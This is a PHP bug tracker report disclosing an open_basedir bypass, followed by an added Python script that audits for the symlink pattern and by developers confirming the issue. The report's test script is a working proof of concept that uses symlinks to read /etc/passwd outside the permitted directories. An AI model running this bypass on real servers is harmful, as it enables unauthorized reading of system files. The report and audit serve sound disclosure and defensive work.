Bug #77850 Open_basedir bypass
Submitted: 2019-04-05 04:48 UTC Modified: 2019-06-18 05:47 UTC
Votes:6
Avg. Score:3.7 ± 1.5
Reproduced:1 of 2 (50.0%)
Same Version:1 (100.0%)
Same OS:0 (0.0%)
From: simon dot vikstrom at gmail dot com Assigned:
Status: Verified Package: *Directory/Filesystem functions
PHP Version: 7.3.4 OS: Linux
Private report: No CVE-ID: None
 [2019-04-05 04:48 UTC] simon dot vikstrom at gmail dot com
Description:
------------
Blaklis_ on Twitter published an open_basedir bypass:

https://twitter.com/Blaklis_/status/1113866828739166208



Test script:
---------------
<?php

/*

I could recreate with:

mkdir -p /var/www/html
chown -R YOURUSER:YOURUSER /var/www 
cd /var/www/html/
php  -d open_basedir=/var/www FILENAME.php

*/

mkdir('/var/www/html/a/b/c/d/e/f/g/',0777,TRUE);
symlink('/var/www/html/a/b/c/d/e/f/g','foo');
ini_set('open_basedir','/var/www/html:bar/');
symlink('foo/../../../../../../','bar');
unlink('foo');
symlink('/var/www/html/','foo');
echo file_get_contents('bar/etc/passwd');


Expected result:
----------------
file_get_contents(): open_basedir restriction in effect.  ....

Actual result:
--------------
Reads /etc/passwd
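
A defender-side audit for the pattern in the test script above, as an added example that is not part of the original report or of PHP itself: it flags open_basedir entries that are relative or are symlinks, and lists symlinks under a base directory whose resolved target lies outside it. The function names and the temporary sample tree are assumptions made for illustration.

```python
import os

def audit_open_basedir(value, cwd):
    """Flag open_basedir entries that are relative or are themselves symlinks."""
    findings = []
    for entry in filter(None, value.split(":")):   # ':' separates entries on Linux
        if not os.path.isabs(entry):
            findings.append((entry, "relative entry"))
        if os.path.islink(os.path.join(cwd, entry).rstrip("/")):
            findings.append((entry, "entry is a symlink"))
    return findings

def escaping_symlinks(base):
    """List symlinks under base whose fully resolved target is outside base."""
    base_real = os.path.realpath(base)
    hits = []
    for root, dirs, files in os.walk(base):        # does not descend into symlinks
        for name in dirs + files:
            path = os.path.join(root, name)
            if not os.path.islink(path):
                continue
            target = os.path.realpath(path)
            if os.path.commonpath([base_real, target]) != base_real:
                hits.append((os.path.relpath(path, base), os.readlink(path)))
    return sorted(hits)

def build_sample_tree(root):
    """Constructed sample: the on-disk end state of the report's test script,
    rebuilt under `root` (standing in for /var/www)."""
    html = os.path.join(root, "html")
    os.makedirs(os.path.join(html, "a/b/c/d/e/f/g"))
    os.symlink(html + "/", os.path.join(html, "foo"))
    os.symlink("foo/../../../../../../", os.path.join(html, "bar"))
    return html

if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as root:
        html = build_sample_tree(root)
        print(audit_open_basedir(html + ":bar/", cwd=html))
        print(escaping_symlinks(root))
```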

 [2019-05-07 09:48 UTC] sjon@php.net
-Status: Open +Status: Verified
 [2019-05-07 09:48 UTC] sjon@php.net
I can confirm this issue - see https://3v4l.org/75AX0
 [2019-06-18 05:47 UTC] jhdxr@php.net
related discussion: https://externals.io/message/105606
 